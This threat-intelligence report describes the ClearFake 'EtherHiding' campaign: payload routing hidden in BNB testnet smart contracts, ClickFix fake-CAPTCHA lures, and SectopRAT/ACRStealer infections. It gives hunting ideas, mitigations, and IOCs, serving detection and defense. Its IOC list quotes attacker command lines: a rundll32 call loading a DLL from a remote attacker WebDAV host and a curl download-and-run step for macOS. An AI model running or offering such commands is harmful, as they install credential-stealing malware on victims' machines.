Smart Contracts for C&C: How ClearFake Hid in Plain Sight on BSC Testnet

What Happened

Cybercriminals are using a technique called 'EtherHiding' to conceal malicious code inside a blockchain network, making it impossible for security companies or law enforcement to take down. When users visit compromised websites, they are shown fake verification messages (like a fake Google reCAPTCHA) that trick them into copying and pasting a command into their computer. This affects both Windows and Mac users, leading to the silent installation of software that steals passwords, browser sessions, and cryptocurrency wallets. Because the malicious infrastructure cannot be deleted from the blockchain, organizations must focus on blocking the specific network connections and training employees never to paste commands from web pop-ups.

Key Takeaways

• Threat actors are utilizing 'EtherHiding' to store ClearFake payload routing instructions inside immutable BNB Smart Chain testnet smart contracts, creating takedown-resistant C2 infrastructure.
• The campaign delivers OS-specific payloads (Windows and macOS) via a 'ClickFix' social engineering overlay that tricks users into executing malicious commands.
• Windows victims are infected with SectopRAT and ACRStealer via a remote WebDAV DLL loaded by rundll32.exe, leading to browser session hijacking and credential theft.
• macOS victims are compromised via a malicious bash script downloaded using curl, and tracked via an injected Yandex Metrika analytics tag.
• The threat actors use a dedicated smart contract to track successful executions in real-time, preventing repeat lure exposure to already-compromised victims.

Affected Systems

• Windows
• macOS
• Web Browsers (Chrome, Edge, Firefox, Safari)

Attack Chain

The attack begins when a victim visits a compromised watering hole website containing an injected JavaScript snippet. This script queries a BNB Smart Chain testnet smart contract via JSON-RPC to retrieve a secondary payload, which performs environment checks to evade sandboxes. Victims are then shown an OS-specific 'ClickFix' fake CAPTCHA overlay that tricks them into copying and executing a malicious command (rundll32 for Windows, curl for macOS). On Windows, this command loads a remote WebDAV DLL into memory, which injects into browser processes and drops SectopRAT and ACRStealer to steal credentials and hijack sessions.

Detection Availability

• YARA Rules: No
• Sigma Rules: No
• Snort/Suricata Rules: No
• KQL Queries: No
• Splunk SPL Queries: No
• EQL Queries: No
• Other Detection Logic: Yes
• Platforms: Trend Micro Vision One

The article provides Trend Micro Vision One hunting queries to detect DNS requests to the BSC testnet RPC endpoint and browser process injection originating from rundll32 executing a remote WebDAV DLL.

Detection Engineering Assessment

EDR Visibility: High — The post-exploitation stages involve highly visible behaviors such as rundll32 executing with UNC paths, process injection into browsers, and DLL sideloading in AppData directories. Network Visibility: Medium — The initial C2 traffic uses standard JSON-RPC over HTTPS to a public blockchain node, which blends with legitimate Web3 traffic, though the specific testnet endpoint may be anomalous in non-development environments. Detection Difficulty: Moderate — While the EtherHiding blockchain C2 is evasive and cannot be sinkholed, the subsequent execution relies on well-known techniques (ClickFix, WebDAV DLL loading) that have strong behavioral signatures.

Required Log Sources

• Process Creation (Event ID 4688 / Sysmon 1)
• Network Connections (Sysmon 3)
• Process Access/Injection (Sysmon 8/10)
• DNS Queries (Sysmon 22)

Hunting Hypotheses

Hypothesis	Telemetry	ATT&CK Stage	FP Risk
Consider hunting for rundll32.exe executing with UNC path arguments pointing to external IP addresses or unknown domains.	Process Creation	Execution	Low
Look for DNS queries or network connections to bsc-testnet-rpc.publicnode.com originating from browser processes.	DNS/Network	Command and Control	Medium
Investigate instances of pythonw.exe launching from unusual hidden directories like AppData\Local\FileZilla.	Process Creation	Execution	Low
Consider hunting for vlc.exe executing from user AppData directories instead of Program Files, indicating potential DLL sideloading.	Process Creation	Defense Evasion	Low

Control Gaps

• Web filtering relying solely on URL blocklists (EtherHiding bypasses this)
• Lack of clipboard execution restrictions in enterprise browsers

Key Behavioral Indicators

• rundll32.exe loading files with non-standard extensions (e.g., .camp)
• Browser processes making JSON-RPC calls to blockchain testnets
• Creation of a unique UUID cookie named 'cjs_id' after querying Avast IP geolocation APIs

False Positive Assessment

• Low

Recommendations

Immediate Mitigation

• Verify against your organization's incident response runbook and team escalation paths before acting.
• Consider blocking outbound traffic to bsc-testnet-rpc.publicnode.com if Web3 development is not required in your environment.

Infrastructure Hardening

• Evaluate disabling the Windows WebClient service on workstations that do not require WebDAV to eliminate the delivery mechanism for remote DLLs.
• Implement enterprise browser management policies to restrict clipboard write access where supported by your tooling.

User Protection

• Ensure EDR policies are configured to detect and block remote thread injection into common browser processes (chrome.exe, msedge.exe).

Security Awareness

• Educate users on the 'ClickFix' social engineering technique, specifically warning against copying and pasting commands from web overlays into the Run dialog or Terminal.

MITRE ATT&CK Mapping

• T1189 - Drive-by Compromise
• T1204.001 - User Execution: Malicious Link
• T1059.007 - Command and Scripting Interpreter: JavaScript
• T1059.004 - Command and Scripting Interpreter: Unix Shell
• T1102 - Web Service
• T1574.002 - Hijack Execution Flow: DLL Side-Loading
• T1055 - Process Injection

Additional IOCs

• Domains:
  • download2324[.]mediafire[.]com - Fallback C2 and download infrastructure used by the Python-based RAT.
• Urls:
  • hxxps://bsc-testnet-rpc[.]publicnode[.]com/ - Full URL used in the fetch request to query the BSC testnet smart contracts.
  • mc.yandex.ru/metrika/tag.js - Legitimate Yandex Metrika analytics script injected into macOS victims for secondary tracking.
• File Paths:
  • C:\Users\[User]\AppData\Local\FileZilla\Data\DC80D99D\ - Directory used to drop the Python 3.15 embeddable runtime and SectopRAT components.
  • C:\Users\[User]\AppData\Local\Mozilla\Firefox\361e6e66.default\ - Directory used to stage the VLC DLL sideloading triad for ACRStealer.
• Command Lines:
  • Purpose: Execute remote WebDAV payload via ClickFix social engineering | Tools: rundll32.exe | Stage: Execution | rundll32.exe \\root-cul.xamir3on.lat\
  • Purpose: Download and execute macOS payload via ClickFix social engineering | Tools: bash, curl | Stage: Execution | curl -A 'Mac OS X 10_15_7' -fsSL
• Other:
  • 0x46790e2Ac7F3CA5a7D1bfCe312d11E91d23383Ff - Smart Contract B: Stores the Windows-specific ClickFix overlay payload.
  • 0x68DcE15C1002a2689E19D33A3aE509DD1fEb11A5 - Smart Contract C: Stores the macOS-specific payload.
  • 0xf4a32588b50a59a82fbA148d436081A48d80832A - Smart Contract D: Stores conversion states to track victim executions and prevent repeat lures.
  • 0xd71f4cdC84420d2bd07F50787B4F998b4c2d5290 - Deployer wallet address for all four smart contracts used in the campaign.
  • helper.py - Shellcode loader script dropped as part of the Python RAT deployment.
  • _remote_debugging.pyd - Python module dropped to facilitate browser credential theft via remote debugging.